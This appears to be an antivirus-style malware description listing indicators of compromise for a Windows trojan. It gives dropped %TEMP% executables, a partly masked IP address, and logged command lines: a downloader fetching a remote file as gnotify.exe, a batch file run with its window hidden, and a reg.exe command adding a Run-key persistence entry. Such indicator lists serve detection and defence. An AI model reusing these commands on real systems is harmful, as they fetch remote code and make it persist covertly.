Technical Information
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'SmarTek' = '%TEMP%\gnotify.exe'
- %TEMP%\dw.exe
- %TEMP%\sleep.exe
- %TEMP%\aplet.exe
- %TEMP%\ff73.tmp\load1_link.bat
- %TEMP%\screewwww.dat
- '65.#8.92.3':80
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\aplet.exe'
- '%TEMP%\dw.exe' http://65.#8.92.3/images/gera.gif ""%TEMP%\gnotify.exe""
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\FF73.tmp\load1_link.bat" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\FF73.tmp\load1_link.bat" "
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SmarTek" /t REG_SZ /d "%TEMP%\gnotify.exe" /f
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\gnotify.exe""